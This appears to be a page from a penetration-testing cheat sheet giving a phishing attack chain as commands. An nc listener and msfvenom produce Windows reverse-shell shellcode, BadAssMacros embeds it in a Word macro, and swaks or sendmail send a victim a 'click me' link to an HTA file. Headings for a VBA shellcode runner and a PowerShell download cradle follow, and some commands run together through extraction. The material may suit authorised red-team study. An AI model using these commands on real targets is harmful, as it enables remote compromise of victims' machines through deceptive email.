Phishing
Simple VBA Shell
nc -lvnp 8080 --- listenerBadAssMacro
Download BadAssMacrosx86.exe from the above repo.
Create the raw shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f raw -o shellcode.rawCopy the out.txt into the Word file
.\BadAssMacrosx86.exe -i shellcode.raw -s indirect -p no -w doc -o out.txtSend the Email
swaks --body 'click me http://192.168.X.X/file.hta' --add-header "Really: 1.0" --add-header "Content-Type: text/html" --header "Subject: Important" -t victim@corp.com -f attacker@corp.com --server 192.168.X.Xsendmail -f attacker@email.com -t victim@email.com -s 192.168.x.x -u "Subject" -m "body"Word Macro
VBA Shellcode Runner (x86)
VBA PowerShell Download Cradle
Last updated